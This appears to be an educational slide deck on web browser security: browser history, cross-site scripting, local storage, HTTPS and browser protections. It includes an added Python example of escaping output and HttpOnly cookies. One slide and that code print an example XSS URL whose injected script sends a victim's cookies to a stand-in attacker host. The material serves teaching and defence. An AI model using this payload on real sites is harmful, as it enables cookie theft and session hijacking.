WEB BROWSER SECURITY
By
Robert Sellers
Brian Bauer
INTRODUCTION
Relevance
▪ Use Internet daily
▪ Transmit personal information, needs to be secure
Content
1. History
2. Security Issues and Mitigation
3. Protection
HISTORY
• First ever browser – WorldWideWeb (1990)
  o Created at CERN by Tim Berners-Lee
  o Used internally, no real security threats
  o Would only display HTML text
  o Allowed downloading of other file types
HISTORY
• Mosaic (1993)
  o First browser with a GUI
  o Led to increase in Internet popularity
• Netscape Navigator (1994)
  o Nearly disappeared by 2000
• Internet Explorer (1995)
  o Held as much as 95% of the market
HISTORY
• Safari (2003)
  o Apple’s browser
• Firefox (2004)
  o Open source
• Chrome (2008)
  o Rapid increase in market share
SECURITY ISSUES
• Increase in security issues
  o Complexity of web sites and browsers
  o Size of the Internet
  o Anyone can access
• Uses of Internet
  o Online banking
  o Shopping
  o More sharing of sensitive data
SECURITY ISSUES
• Cross Site Scripting (XSS)
  o Takes advantage of complex, dynamic web pages
  o Injects client side scripts, HTML
  o Can lead to cookie theft, browser redirection, untrusted content
  o Nearly 80% of vulnerabilities in 2007 (Symantec)
SECURITY ISSUES
Example
http://portal.example/index.php?sessionid=12312312&username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting
• XSS Mitigation
  ▪ Disable scripting
  ▪ Sanitize input, escape HTML/scripts
  ▪ No script access to cookies
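
Two of the mitigations above (escaping HTML on output and denying scripts access to cookies) applied to the slide's example URL, as an added example that is not part of the original slides. The function names, the welcome-page markup and the choice of Python are assumptions made for illustration.

```python
# Added example (not from the original slides): the slide's example URL,
# rendered without and with output escaping, plus an HttpOnly session cookie.
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit, parse_qs

# The example URL from the slide; both hosts are the slide's .example names.
SLIDE_URL = (
    "http://portal.example/index.php?sessionid=12312312&"
    "username=<script>document.location='http://attackerhost.example/cgi-bin/"
    "cookiesteal.cgi?'+document.cookie</script>"
)

def username_from(url):
    """Extract the user-controlled 'username' query parameter."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("username", [""])[0]

def render_vulnerable(url):
    """Echo the parameter into HTML verbatim: the <script> tag survives."""
    return "<p>Welcome, " + username_from(url) + "</p>"

def render_escaped(url):
    """Escape HTML metacharacters so the value is shown as text, not executed."""
    return "<p>Welcome, " + html.escape(username_from(url), quote=True) + "</p>"

def session_cookie_header(session_id):
    """Build a Set-Cookie value that page scripts cannot read (HttpOnly)."""
    cookie = SimpleCookie()
    cookie["sessionid"] = session_id
    cookie["sessionid"]["httponly"] = True  # hidden from document.cookie
    cookie["sessionid"]["secure"] = True    # only sent over HTTPS
    cookie["sessionid"]["path"] = "/"
    return cookie["sessionid"].OutputString()

if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SLIDE_URL))
    print("escaped:   ", render_escaped(SLIDE_URL))
    print("Set-Cookie:", session_cookie_header("12312312"))
```
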
SECURITY ISSUES
• Local Storage
  o Form data
  o Login credentials
• Encryption - HTTP vs HTTPS
  o Packet sniffing -> session hijacking, password stealing
PROTECTING YOURSELF ONLINE
• Incognito Mode (Google Chrome)
  ▪ Allows user to switch between multiple privacy settings with the click of a button
  ▪ Can be activated in one window/tab but not others
• Browser Guards
  o Modern browsers will prevent users from visiting malicious sites
  o Two main methods
    ▪ List of reported malicious sites
    ▪ Algorithm to detect malicious code on a site
  o This can protect from viruses, phishing, and other threats
CONCLUSION
• Browsers can only do so much
• Much security is responsibility of web designers
• Internet users should be aware of issues